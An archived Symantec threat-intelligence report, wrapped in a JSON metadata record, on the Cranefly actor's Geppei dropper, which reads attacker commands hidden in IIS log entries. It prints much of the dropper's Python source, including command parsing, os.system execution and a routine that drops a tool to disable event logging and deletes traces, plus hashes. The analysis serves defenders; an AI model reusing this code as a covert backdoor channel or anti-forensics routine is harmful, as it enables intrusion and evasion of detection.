{ "id": "f8f77f81-0311-42f6-bbec-681e67d8f607", "created_at": "2026-04-06T00:18:51.795019Z", "updated_at": "2026-04-10T13:11:51.371439Z", "deleted_at": null, "sha1_hash": "abdea12c77f816bfe9777978a9363c4f892ab394", "title": "Cranefly: Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 69978, "plain_text": "Cranefly: Threat Actor Uses Previously Unseen Techniques and\r\nTools in Stealthy Campaign\r\nBy About the Author\r\nArchived: 2026-04-05 19:02:53 UTC\r\nUpdate November 2, 2022: Updated with new information regarding the link to UNC3524.\r\nSymantec, by Broadcom Software, has discovered a previously undocumented dropper that is being used to install\r\na new backdoor and other tools using the novel technique of reading commands from seemingly innocuous\r\nInternet Information Services (IIS) logs.\r\nThe dropper (Trojan.Geppei) is being used by an actor Symantec calls Cranefly to install another piece of hitherto\r\nundocumented malware (Trojan.Danfuan) and other tools. The technique of reading commands from IIS logs is\r\nnot something Symantec researchers have seen being used to date in real-world attacks.\r\nInitial analysis appeared to show a link between Cranefly activity and the activity of a group called UNC3524 that\r\nMandiant published a blog about in May 2022. This link was primarily based on the use of the Regeorg webshell,\r\nhowever, as this is publicly available on Github, its use alone is not sufficient to establish a firm link.\r\nTechnical Details\r\nThe first malicious activity Symantec researchers saw on victim machines was the presence of a previously\r\nundocumented dropper (Trojan.Geppei). It uses PyInstaller, which converts Python script to an executable file.\r\nGeppei reads commands from a legitimate IIS log. IIS logs are meant to record data from IIS, such as web pages\r\nand apps. The attackers can send commands to a compromised web server by disguising them as web access\r\nrequests. IIS logs them as normal but Trojan.Geppei can read them as commands.   \r\nThe commands read by Geppei contain malicious encoded .ashx files. These files are saved to an arbitrary folder\r\ndetermined by the command parameter and they run as backdoors.\r\nThe strings Wrde, Exco, and Cllo don't normally appear in IIS log files. These appear to be used for malicious\r\nHTTP request parsing by Geppei; the presence of these strings prompts the dropper to carry out activity on a\r\nmachine.  \r\nThe attackers can use a dummy URL or even a non-existent URL to send these commands because IIS logs 404s\r\nin the same log file by default.\r\nflist = ['Wrde', 'Exco', 'Cllo', 'AppleWEBKit']\r\ntimenumber = 10\r\nrows = 0\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 1 of 6\n\ngflag = 0\r\nwhile True:\r\n    time.sleep(600)\r\n    print('One Two Three')\r\n    try:\r\n        today = datetime.date.today()\r\n        list1 = str(today).split('-')\r\n        filename = 'u_ex' + list1[0][2:] + list1[1] + list1[2] + '.log'\r\n        path = 'C:/inetpub/logs/LogFiles/W3SVC1/' + filename\r\n        if os.path.exists(path):\r\n            shutil.copy(path, 'C:\\\\windows\\\\temp\\\\IIS1.log')\r\n            fp = open('C:\\\\windows\\\\temp\\\\IIS1.log', 'r')\r\n            line = fp.readline()\r\n            for i in range(rows):\r\n                line = fp.readline()            if line != '':\r\n                if len(line.split('Wrde')) == 3:\r\n                    temp1 = line.split('Wrde')\r\n                    wrde(temp1[1])\r\n                if len(line.split('Exco')) == 3:\r\n                    temp2 = line.split('Exco')\r\n                    exco(temp2[1])\r\n                if len(line.split('Cllo')) == 3:\r\n                    clear()\r\n                line = fp.readline()\r\n                rows += 1\r\n            else:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 2 of 6\n\nfp.close()\r\n                os.remove('C:\\\\windows\\\\temp\\\\IIS1.log')\r\n    except:\r\n        print('Bye-Bye')\r\nIf the malicious HTTP request sample contains \"Wrde\" e.g.:\r\nGET [dummy string]Wrde[passed string to wrde()]Wrde[dummy string]\r\nThe passed string to wrde() is decrypted by Decrpt().\r\nThe decrypted string is expected to look like the following:\r\nw+1+C:\\\\inetpub\\\\wwwroot\\\\test\\\\backdoor.ashx\r\nThese are the malicious .ashx files, which are saved as:\r\nC:\\\\inetpub\\\\wwwroot\\\\test\\\\backdoor.ashx\r\nThe backdoors that are dropped by this dropper include:\r\nHacktool.Regeorg: ReGeorg is a known malware, a web shell that can create a SOCKS proxy. Two\r\nversions of ReGeorg were seen in the activity observed by Symantec.\r\nTrojan.Danfuan: This is a previously unseen malware. It is a DynamicCodeCompiler that compiles and\r\nexecutes received C# code. It appears to be based on .NET dynamic compilation technology. This type of\r\ndynamically compiled code is not created on disk but exists in memory. It acts as a backdoor on infected\r\nsystems.\r\nWhen the malicious HTTP request sample contains \"Exco\", e.g.:\r\nGET [dummy string]Exco[passed string to exco()]Exco[dummy string]\r\nThe passed string to exco() is decrypted by Decrpt() and this decrypted string is an executable command by\r\nos.system().\r\nIf the malicious HTTP request contains \"Cllo\", function clear() is called. This function drops a hacking tool called\r\nsckspy.exe to disable eventlog logging for Service Control Manager. This appears to be another previously\r\nundocumented tool.\r\nIt also appears that the clear() function attempts to remove lines that contain command or malicious .ashx file\r\npaths from the IIS log file; however, it does not inspect all lines so this function does not seem to work as\r\nintended.\r\ndef clear():\r\n    global gflag\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 3 of 6\n\nglobal rows\r\n    text4 = '[malicious base64 encoded exe file]'\r\n    if gflag == 0:\r\n        try:\r\n            fw = open('c:\\\\windows\\\\temp\\\\DMI27F127.txt', 'w')\r\n            fw.write(text4)\r\n            fw.close()\r\n            os.system('certutil -decode c:\\\\windows\\\\temp\\\\DMI27F127.txt c:\\\\windows\\\\temp\\\\DMI27F127.cab')\r\n            os.system('expand c:\\\\windows\\\\temp\\\\DMI27F127.cab c:\\\\windows\\\\system32\\\\sckspy.exe')\r\n            os.system('c:\\\\windows\\\\system32\\\\sckspy.exe \u003ec:\\\\windows\\\\temp\\\\DMI27F128.txt')\r\n            fp = open('c:\\\\windows\\\\temp\\\\DMI27F128.txt', 'r')\r\n            str1 = fp.readline()\r\n            if str1.find('success') != -1:\r\n                gflag = 1\r\n            fp.close()\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F127.txt')\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F127.cab')\r\n            os.system('del c:\\\\windows\\\\system32\\\\sckspy.exe')\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F128.txt')\r\n        except:\r\n            print('bye-bye')\r\nDropped malicious .ashx files (i.e. Trojan.Danfuan and Hacktool.Regeorg) are removed in wrde() if it is called\r\nwith option 'r':\r\n        if info[0] == 'r':\r\n            temp = info[2].replace('\\\\\\\\', '\\\\')\r\n            os.system('del ' + temp)\r\n            name = temp.split('\\\\')\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 4 of 6\n\nif name in flist:\r\n                flist.remove(name[(-1)][:-1])\r\nAttribution\r\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code\r\nis publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link\r\nthis activity to any known groups.\r\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim\r\nmachines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from\r\nvictim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely\r\nmotivation for this group is intelligence gathering.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nTrojan.Geppei\r\n12eaac1b8dc29ba29287e7e30c893017f82c6fadb73dbc8ef2fa6f5bd5d9d84e\r\n981b28d7521c5b02f026cb1ba5289d61ae2c1bb31e8b256db21b5dcfb8837475\r\n6dcfa79948cf90b10b05b59237cf46adb09b2ce53bc2c0d38fce875eccd3a7e1\r\n0af8bf1fa14fe492de1cc870ac0e01fc8b2f6411de922712a206b905a10ee379\r\n7d5018d823939a181a84e7449d1c50ac3eb94abf3585a2154693ef5180877b95\r\nb5a4804cf7717fda1f01f23c1c2fe99fe9473b03f0247bcc6190f17d26856844\r\nHacktool\r\n1975bea7ca167d84003b601f0dfb95c4b31a174ce5af0b19e563cb33cba22ffa\r\nHacktool.Regeorg\r\n56243c851b13218d3031ca7e5af8f2b891e139cbd6d7e3f40508e857802a1077\r\n0b8d024ec29619ff499e4b5024ff14451731a4e3155636a02ef5db2df0e0f0dd\r\nTrojan.Danfuan\r\n0b168638224589937768eb15c9ebbe795d6539d1fbe744a8f065fedd569bfc5e\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 5 of 6\n\nCranefly: Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign\r\nThreat Hunter Team\r\nThreat Hunter Team\r\nSymantec and Carbon Black\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan" ], "report_names": [ "cranefly-new-tools-technique-geppei-danfuan" ], "threat_actors": [ { "id": "94890f31-3a6c-447b-8995-5c5958efea28", "created_at": "2023-01-06T13:46:39.352776Z", "updated_at": "2026-04-10T02:00:03.29716Z", "deleted_at": null, "main_name": "UNC3524", "aliases": [], "source_name": "MISPGALAXY:UNC3524", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ff183540-67fb-4514-bd30-b4a264795901", "created_at": "2022-10-25T16:07:24.367762Z", "updated_at": "2026-04-10T02:00:04.956814Z", "deleted_at": null, "main_name": "UNC3524", "aliases": [], "source_name": "ETDA:UNC3524", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434731, "ts_updated_at": 1775826711, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.pdf", "text": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.txt", "img": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.jpg" } }